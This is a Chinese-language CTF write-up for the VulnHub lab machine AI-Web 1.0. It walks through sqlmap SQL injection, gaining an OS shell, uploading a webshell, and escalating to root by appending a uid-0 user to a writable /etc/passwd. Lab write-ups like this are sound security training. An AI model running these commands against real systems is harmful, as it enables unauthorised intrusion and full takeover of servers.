vulnhub靶机AI-Web1.0

vulnhub靶机AI-Web1.0
知识点:

sql注入
sqlmap拿shell
对/etc/passwd 文件写入进行提取

信息收集

扫描靶机ip

1
nmap -aP 192.168.211.1/24

扫到靶机ip为192.168.211.145

2.扫描靶机开放端口

1
nmap -A 192.168.211.145 -p 1-65535


发现靶机只开放了80端口,并且扫描到了几个目录,我们先访问一下80端口

发现什么都没有,扫描一下网站目录

1
2
nikto -h 192.168.211.145	#这个并没有什么发现换一个目录
dirb http://192.168.211.145/m3diNf0

最后发现了一个info.php,并且可以访问

然后访问一下robots.txt,在一次访问一下里面的目录,最后在http://192.168.211.145/se3reTdir777/下发现一个输入框

猜测应该是存在SQL注入,然后测试了一下发现是单引号闭合的SQL注入。直接抓包放到sqlmap里面跑一下,成功

1
sqlmap -r sql.txt -p uid --dbms mysql --dbs


最后在systemUser表下发现了几个用户和密码,密码经过base64加密

接下来就可以getshell了

getshell

先 查看mysql的权限

1
sqlmap -r sql.txt --privileg  --batch

FILE权限 可以对服务器本地文件进行操作

尝试使用–os-shell直接得到shell

使用OS_shell的条件
(1)具有file权限
(2)攻击者需要知道网站的绝对路径
(3)GPC为off,php主动转义的功能关闭
第一点满足了,绝对路径可从info.php中找到
并且我们又发现了一个uploads页面,所以可以

1
sqlmap -r sql.txt --os-shell

1
ls -al   发现两个php页面,依次访问,发现一个上传页面,

直接上传一个大马,成功

访问,输入密码,很舒服

然后反弹shell,再使用python进入交互模式

1
python -c 'import pty;pty.spawn("/bin/bash")'


感觉有点多此一举,其实就是想试试大马 哈哈

提权

该用户不是root用户但是该用户可以对/etc/passwd 文件进行写入权限


写入的时候需要加密密码

1
openssl passwd -1 -salt admin 111111

1
echo 'admin123:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash' >> /etc/passwd


切换用户后就变味root权限了

这个操作在dc-9和dc-4里面也有相似的

文章作者:CyzCc
最后更新:2020年06月05日 17:06:09
原始链接:https://cyzcc.vip/2020/03/20/AI-Web1/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------